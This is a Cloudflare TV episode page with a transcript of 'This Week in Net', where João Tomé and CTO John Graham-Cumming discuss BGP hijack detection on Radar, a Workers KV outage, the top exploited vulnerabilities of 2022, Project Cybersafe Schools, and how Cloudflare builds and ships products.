BGP hijack detection, exploited vulnerabilities, and how we build our products

Presented by: John Graham-Cumming, João Tomé

Originally aired on September 10, 2024 @ 12:00 AM - 12:30 AM EDT

Welcome to our weekly review of stories from our blog and other sources, covering a range of topics from product announcements, tools and features to disruptions on the Internet. João Tomé is joined by our CTO, John Graham-Cumming.

In this week's program, most of our Portugal team is responsible for welcoming everyone. We also cover some of the blog posts from the last two weeks. This includes Cloudflare Radar's new BGP origin hijack detection system, the most exploited vulnerabilities of 2022, and our Project Cybersafe Schools, which offers free security tools to small K-12 school districts in the United States.

We will also focus on a more general topic: the process of building things, from new features to the decision-making process of working on shipping new categories of products to the world. How has Cloudflare approached this, from ideas to demos to iteration? And how has the process evolved over the years? Workers, our developer platform used by many thousands of developers, is one example of this.

You can check the mentioned blog posts:

English

News

Transcript (Beta)

Three, two, one. Hello from Lisbon, Portugal, and welcome to This Week in Net. Say bye. Hello, everyone, and welcome to This Week in Net. We're live from Cloudflare's Lisbon office in Portugal. It's the August 11, 2023 edition, and we're going to share a few highlights from our blog, but also go into how we build stuff in a way, the Cloudflare way. I'm João Tomé, based in Lisbon, and with me I have, as usual, our CTO, John Graham-Cumming. Hello, John, how are you? I'm fine, thank you. How are you doing? I'm good, too. We're not far away. We're both in the Lisbon office today. Yeah, where are you? Can I see you if I look? It's possible because I'm there. It's true. We have a bunch of visits today, actually, from the U.S. in the Lisbon office. Dane, I just witnessed a fireside chat with Dane Knecht, our senior vice president. Emerging Technology and Incubations, one of the engineering leaders in Cloudflare. Exactly. So it's busy for August, the Lisbon office today. And, of course, Matthew is here. A lot of people are here, so it's good to see this proximity in terms of its office in Europe, but a lot of people from the U.S. are here. Actually, I don't know where you are, but I'm in a glass wall office where half the company is lining up over there getting lunch. So we're recording this and I can smell the food coming into the room. I can because I'm further away. Well, we were out for a few two weeks. A few blog posts to mention. So let me just share my screen and then we can... Yeah, let's do it. Let's do it. This is the view of our more recent blog post, in a sense. Since we went away, in a sense, there's this Cloudflare Radar new BGP Origin Hijack Detection System blog post. That's pretty cool, actually. So Cloudflare Radar has just been growing and growing and growing with more and more stuff, more and more data about what's happening on the Internet. And recently we've had a bunch of stuff around BGP, but we've also been starting to do detection of hijacks. So when someone's BGP, where their ASN is, is misdirected. And we've done this internally for a while and now added it as a feature. So you can go in and look at the hijacks that are happening on the Internet where traffic gets misdirected because of something happening in BGP, often deliberately and sometimes accidentally. And there's a new page on Radar and there's a new alerting mechanism so you can actually see how the Internet gets disrupted sometimes. And I think people don't necessarily appreciate that BGP is the thing that makes the Internet. In a sense, the Internet is a network of networks. And how those networks find each other and know who's connected to who and how to get from one place to another is BGP. It lays out kind of the route map of the Internet, like how to get from place to place. And weirdly enough, there's no security built into BGP itself. If you read the original BGP RFCs, there are no security features. So security features have been layered on, one of which is RPKI, which as we mentioned in the blog post here. But because there's no security, it is possible sometimes for people to deliberately or accidentally claim to be some network that they're not. Like there was a very famous example a few years ago in Pakistan where the government wanted to censor YouTube and they accidentally said that they were all of Google. And a tremendous amount of traffic suddenly got sent to Pakistan, which is probably not a good idea, not what they intended. But these things happen. And it was a disruption, right? It was a disruption, yes. And so over time, we as a community have worked to make things better. But we have built this system which can detect when we believe an origin is being hijacked, taken over by someone else. That is to say someone's network is being misdirected. And read all about it in this very long blog post, which describes how we built the module, what data sources we're using. And then you can just go to radar.Cloudflare.com, I think, slash routing, I think. And you can see all that information on radar. It is. Routing is the place to go. And if you haven't been on radar recently, look at that menu on the left there, traffic data, security data, adoption of protocols, Internet quality, which is really interesting. We talked about it once before. We did. Which is around, you know, how good are ISPs in different axes, outage center, what things are out, the URL scanner. You can check a URL to see if it's genuine or not. You know, if you get one of those, like if you get a weird text message with a URL in it, well, you can pump it into here and we'll look at it for you rather than you risking your browser or something. So radar has really grown enormously. Yeah. So BGP hijack detection is the latest thing. And for me, it was like a surprise when I got to understand that hijack is really hijack. The name is correctly put there because it's all about the Internet. But it's something that hijacks the way the Internet was supposed to work, in a sense. Yeah. So it's quite important. And this alerts part in notifications model is quite important, too. Yeah. I mean, we can like this is how we're going to be able to alert you if a particular network is being hijacked, for example. And we've certainly seen hijacks be the source of outages in the past. Exactly. There's a bunch here explaining that. And by the way, who is the typical user of these types of things? Like those thousands of people that work in network, right? Yeah, probably the people who work in networking in general will be very, very interested to see this stuff as we as we put it out there. So it'll be it'll be useful. But also, if you're curious, like your ISP doesn't seem to be working, you can go to the hijack page. You go to your ISP's page and it will actually tell you, are we seeing an outage? Are we seeing, you know, some issue that's related to BGP or some other issue? So definitely, definitely worth checking out radar. There's so much in here. And actually, you paused on the API. I think this is the hidden gem in radar is this incredibly rich API where everything that's in the UI and more is available. And more. And more is available through the API. Well, in particular, you can combine data in the API. So you can like, you know, look at two trends simultaneously and stuff like that. So definitely worth definitely worth checking out. True. I use the API all the time because, again, it has more than than radar front end in general. So that's a good place to to start, too. We also had some workers perspectives called the database integration. Well, let's do the hardening workers. Because I think that was is really worth it. So we'd had a sort of series of incidents during during July with workers. So workers gave me as a product that gives you a key value storage can be used within workers. And these these these these impacted customers. And so we really wanted to look into how you know what the issues were and what was happening. And one of the problems is with KB is we use it ourselves. One of the good things. Right. We eat our own dog food. We drink our own champagne. Right. We use workers KB internally. So if there's a workers KB problem, then it affects customers don't necessarily directly use KB. And so this was just a blog post. We have a we have a habit of going through out. There's an outage of really talking about the detail of it. That's part of what Cloudflare does. And, you know, here we are. I mean, we. We go through in a lot of detail about what caused these particular outages. And so if you're interested in outage reports and how things go wrong, this is the blog post for you. And this is if you were affected, you'll be able to find out what happened. So, you know, obviously detailed timeline. And then and so on. And look at how, you know, how we how we how we dealt with the problem. So so. It's it's interesting even to to understand how these types of risks can happen. Right. How it happened and, you know, what improvements we're making. So. Exactly. More more that we had in the blog. Some Zero Trust news. Yeah. I mean, as you say before, there was the one about workers and Upstash. That's a nice integration with Upstash. Here we have an integration with Datadog for the Zero Trust stuff. So lots of the infrastructure that's around this around Cloudflare. Because obviously we don't just work in isolation. Our customers use us with other with other things. So. True. And we also have an enmasking the top exploitive vulnerabilities of 2022. Right. This, in a sense, it's following up on a report from CISA, the cybersecurity infrastructure security agent from the US. They released a report highlighting the most commonly exploited vulnerabilities. And in a sense, because we we also have a very good perspective in terms of the Internet, we try to do our own analysis in terms of some of those vulnerabilities there. And we did a popular popularity ranking in a sense of the top CSVs, the vulnerabilities in this case for 2022. Yeah. I mean, I mean, it sort of doesn't surprise me that log4j and in general, right. Improper input validation that caused log4j is still popular because, of course, people are still scanning for it. Because one of the things about log4j is like how long it persisted. Right. You know, many, many attacks are things that happen and instantaneously you've broken in. But with log4j, because strings could get passed around by back end systems, often those back end systems were written in Java. You could have something happen, you know, potentially days or weeks or even months later. So it was worth kind of spraying the whole world with bad strings to see if at some point you got in. So I'm not surprised that was around. And the Atlassian one, again, Confluence is very popular. And, you know, people trying to get into Confluence, especially because Confluence, because it's a wiki, likely contains a lot of sensitive information in a company. So breaking into it would be very, very valuable for an organization, as does the third one, Microsoft Exchange. I mean, if you get into Microsoft Exchange, you can get into a company's email. And also we saw recently some actually very direct hacks against, you know, email handled by Microsoft, which has been causing problems. So, you know. Not a big surprise there. And then, you know, obviously we carry on with other things, you know, where there's big the big IP one is interesting because that's piece of infrastructure. Right. If you can get into a piece of infrastructure, you can probably do something. And we saw attacks in the past against, you know, physical infrastructure devices and so on. I mean, you see these kind of things. But yeah, Log4j is the winner of 2022. So not for good reasons in a sense, but these vulnerabilities can, like you were saying, can be exploited much later. After the Log4j one can. Yeah, the Log4j one. Absolutely. Yes. So it's always good to be aware and know that the protections are in place and the services you use. Well, yeah. And also just the hell of going through every, you know, every system that has Java in it and seeing if it was using, you know, Log4j. It was a really big, big task for companies. And as with so many of these vulnerabilities, it dropped just before Christmas. So we all got to spend our Christmas trying to remediate it. I remember that we had a blog post about that. More than one. I think we had two or three blog posts about what we're doing to protect our customers, what we're doing. Because one of the things that happened with Log4j was our initially our response was protect our customers. Right. There was all the scanning going on. And then there was a bit of a cat and mouse thing with the WAF where people were adjusting, adjusting the patterns that were being used in the WAF. And then actually very quickly, actually, right at the beginning, we're suddenly like, wait a minute. We use Java internally because we use Apache Kafka and various other things. And so we had to, we ourselves had to go and patch and figure out if we were vulnerable. Makes sense. And again, we're trying mostly to augment a little bit that the CISA's vulnerability report. Right. And showing our own perspective there. Yep. Tell us about CyberSafe. You know about CyberSafe and I don't really know much about that. So actually this is a great initiative from our policy team in a sense. Our policy team actually was at the White House this week presenting all about this type of, this project in a sense. This is a project where we're actually giving to K-12 schools in the U.S. at least with less than 2,500 students, I believe, our Zero Trust cybersecurity services. And this comes to, in a sense, a preoccupation that the U.S. has and this White House has in terms of making schools more safe. Because education is one of those sectors that several times is vulnerable to cybersecurity incidents. There's not a lot of money sometimes in some schools to spend on cybersecurity. So we're trying to help there with this project. It's not the first time we have projects like this. And this was announced this week, this one in specific. There's also some data here that I actually helped put together. For example, in Q2 2023, we blocked an average of 70 million cyber threats each day targeting U.S. education sector websites, Internet properties. And there was a big increase, 47% in DDoS attacks quarter over quarter also in the second quarter. And we also have some examples here of some public schools in the U.S., the target of attacks. So this is a trend, in a sense, that is happening and we're trying to help there. A pretty sad trend. I mean, it's like we've seen hackers go up to hospitals and other bits of kind of civil infrastructure, right? Health is also one of those situations where it's pretty much common. One of the big areas, yeah. True. And there's other projects actually related in a sense like Project Galilee. We already spoke about that in previous episodes. And also Project Safekeeping that it's actually for Europe, for example, and other countries is doing a little bit of that Q12. So this one was presented in December and is actually helping those types of pretty much needed infrastructure that are vulnerable with our products in many countries, including Portugal. So that's our project Cyber Safe Schools for you. Yeah, that was great. A great, great initiative for many of these things. And more recently, we also introduced this feature in a sense. Yeah, it's a little feature, right? If you're using Advanced Certificate Manager, you're an enterprise customer and it's just more configuration options, right? In this case for TLS. So there's one of those blog posts that's in our continuous improvement of the product kind of things. It's not sort of dramatic, big announcement or something like that, but it's like, here's another feature. And there's actually another one going out today about for Cloudflare Stream, which is our video streaming product. We now added a feature where you can set an automatic deletion date. And that will go out in about, well, by the time you're watching this, it's definitely be out. So, yeah, because some people want to like stream video and have it available for 30 days or something and make it disappear automatically. So we're adding yet another little cool feature that's coming. Here it is. That one. Nope, that's not that one. That's a different one. No, it's not. That's another one. That might go out today too. True. Debug queues from the dash. Yeah. This is a very, very cool feature built by an intern. It's really, really cool. But I don't know if it's going out today or not yet. Maybe. Okay. Let's not dwell into that one. We still have a few minutes. I want to talk about we're doing sometimes these initiatives like talking about Cloudflare history or Internet history or computing history. And in this case, I was aiming to talk about how, in a sense, how we build stuff. How the process from idea to a little bit of science to technology to shipping a product works. How would you summarize that process? Actually, let me start, actually. We have now something called demo hour with you and Dane Connect. Oh, yes. And I've been fascinated by that because I learned a lot just by hearing the feedback. You can see the collaboration going on. Someone presenting something. Someone that is building something, presenting something. And the idea is flowing, right? Yeah. Was that like that in the beginning? Well, no. I mean, the thing is, in the beginning, when the company is so small, you don't need any situation set up. They don't need to create a demo, right? Because people will just show you stuff. And, in fact, our internal company meeting, which is called the BEER meeting, although there's no beer available, used to have product demos in it, like someone would demo stuff, because right at the beginning. And then, of course, over time, that no longer made sense, right? Like the company is getting huge. So you lost a little bit that. So we reinstated this idea of demo hour, which is people come. There's just a bunch of people demo stuff. Big, big, big focus on demoing, not producing presentations. Sometimes people have slides, but we're like, really? I mean, the less slides I see, the better. And just demo what they're working on. Yesterday, we saw a bunch of really cool stuff around R2, around how the core technology in R2 works. And we saw a bunch of stuff around Privacy Pass, which is a really interesting zero-knowledge way of proving something to a website, such as you own an account or you're human or something like that, without giving away any information in either direction, right? So the website doesn't learn who you are. And if there's an intermediary, the intermediary doesn't learn any connection. And actually, we're seeing those kind of technologies get used quite a lot. So if you use iCloud Private Relay, which we help with some of the infrastructure for, again, that breaks the link between who you are and what's being done. And I think that's actually a big future trend for the Internet in general, is to not make everything so trackable and so easy to link up. I'm curious about, we have a research team, but in the beginning, there was no research team, of course. Actually, it was the cryptography team, right? In what way science plays a role in finishing products? How is that decision made? Oh, we're working on this in terms of research, of science, of patents, for example. And then we start using this, thinking of this as a product. How can we ship this? Well, I think we've always had a bias towards shipping stuff, right? And you will have noticed that we ship and ship and ship and ship continuously. So we want to get stuff out early. So the whole company, I think, really is into shipping. I think you asked specifically about the research team. I mean, the research team, what we have in that team is a bunch of people who are, they lean more towards the academic side than the engineering side. That's not to say there aren't engineers in there, but it's more working with universities, working with standards bodies sometimes. And they tend to be working on things that are a bit further out. So the fact that we were rolling out post-quantum cryptography is because the research team was deeply involved in the original algorithms and the testing of those algorithms in coordination with other people in the industry. So they are a way of keeping us ahead on all technologies, right? But ultimately, we will want to ship those things in our products, right? So they're not doing a pure research. So they're not Bell Labs, and they're probably not going to reinvent the transistor and then suddenly realize it's the greatest thing ever. But I think that they are doing stuff which looks us out five years. And it's interesting, you were talking earlier about Dane Connects Group, which is emerging technology. They're probably looking at things out that are maybe a year or two, like slightly different bets, right? So we have this different setups of different teams that are working at different kind of like risk profile and time to ship and all that kind of stuff, although there's a focus on shipping for everybody. About that, in terms of shipping, there's a lot of products, like you were saying, that we launched. We were known for that. How is the shipping things and break things perspective in Cloudflare evolved? Because shipping, for example, you ship, you see the feedback. We have a lot of free customers. That also helps in terms of giving us that feedback. But how does the iteration works with so much shipping? Well, I do think it's one of the most interesting things about Cloudflare, right? As we've scaled up, which is in the beginning, when we were very small, we could ship something. And if we broke all of Cloudflare, well, 1,000 customers, it was bad for them, but it was not the impact it is today. If you break all of Cloudflare today, I mean, we think we're handling about one in five websites and APIs and apps on your phone and companies' back ends. We just can't break, right? So the interesting challenge is how do you keep shipping stuff super, super fast and not break your network? And, of course, the way you do that is a whole bunch of infrastructure in how you roll things out. We have this thing where we can slice our entire global network into little sections, and then we can give different users different versions of the software so we can observe that around the world. So that really would minimize a breaking change. We have all sorts of testing stuff being done. There's a lot of new, actually, internal work being done on the testing infrastructure for everything. So it's like that is actually kind of a fascinating thing, which is like how do you build a system that you can roll out new changes to and roll back really fast if you need to? And even if you did break something, the impact is minimized. Because in the beginning, the sort of ship fast and break things is great. Now it's like ship fast. If you break something, make sure the impact of that break is tiny, and you can unbreak very fast. Makes sense. There's this perspective in terms of choosing what to work on. We're always shipping a lot, but we must choose, because ideas, everyone has those. We must choose what to work on. In terms of that type of strategy, in the beginning, of course, we had not that many products, so that decision probably was more easy. How is the process of what should we focus on? What should we build and ship next, now? Well, it depends on what level you're thinking about. Because if you think about the announcement of the TLS thing we just talked about in advanced certificate stuff, there's a product management team, and then the associated engineering team working very close to them. They have a planning process, and they're making trade -off decisions about what features and what customers want, what the market looks like. So they have a whole plan, right? And every three months, they know all this stuff's coming out. And then we have emerging technology and research, which are doing things like longer bets. So their planning won't be so detailed in the same way as maybe the product team does, but they'll also be perhaps slightly more making a bet around, okay, we think we should enter this market area, or we think this large feature area should be done. So they'll be working off in that direction. So they're doing less of the talking to all the customers, figuring out the very detailed kind of product management stuff, and a bit more of the slightly pie in the sky. We famously did something which was an essential failure, right? We were very, very involved in Google AMP. And Google AMP is really disappearing at this point. But that was a thing that emerging technology was able to do, was able to say, we're going to make a bet on this. We're going to see what happens, where it goes, et cetera, et cetera. To be honest, as a former journalist, I used a lot of Google AMP as a coordinator of a website, a journalist's website. So a few years ago, that was huge for a journalistic company. It was huge. And we were the only people who had an independent AMP cache. And so here we are. But for example, there's also a twitch there. For example, we created new categories. We, like Warp, like Zerotrek, those were workers. Those were created. What is the process there of, hey, let's go into this. This is a new chapter for us. Let's go into this. Well, to be honest, there's been a long list of things Cloudflare has wanted to do right from the very beginning. We have essentially stayed on a plan that was formed 12 years ago. Obviously, things have come along, and we've reacted to the market, and we've changed a little bit. But we have never gone through a big pivot and changed total direction. So something like workers, we originally actually used to do custom code for our customers. And it was a nightmare because we would write it for them. And we would have to – it was actually part of our main software build. So every time a customer changed something, we had to rebuild our software. Obviously, that was not viable. And so workers came out of there's a real need for this. And then particularly when the Sandstorm team, so particularly Kenton Barder, who's sort of the spiritual leader of the workers team, came on board, there was this idea that we could expand what we were doing around programmability of our platform to make it this really new type of development platform. So I remember very well actually having lunch with a few people, Matthew, the CEO, Kenton, myself, and I think there was a couple of other people there in a Mexican restaurant in San Francisco where we're like, we should definitely do this workers thing. Let's just do it. Let's make the platform programmable. So it depends. Some of those things are like a little bit top down. Some of those big strategic things, it sort of depends what it is. And it's quite interesting, especially to see a product like workers. It's used by thousands of developers. Millions, I think. Maybe millions at this point. So I don't know the actual number exactly, but it's incredibly, incredibly popular. Yeah, it's quite amazing to see that process. This was a great sum up, short sum up for how we do stuff. Thank you, John. Yeah, nice to see you. You're out next week, so we will come back when you will come back too. No, I think I'm back. I think I'm here next week. Oh, you are? Unless you know about vacation I didn't know about. I thought you were out. No, I'm pretty sure we'll have another This Week in Net next week, so see you then. What I am going to do is go and get lunch because it's right over there. See you in a bit. Bye-bye. Bye. Say bye. Perfect. .

This Week in NET

Tune in for weekly updates on the latest news at Cloudflare and across the Internet. Check back regularly for updates. Also available as an audio podcast!

Watch more episodes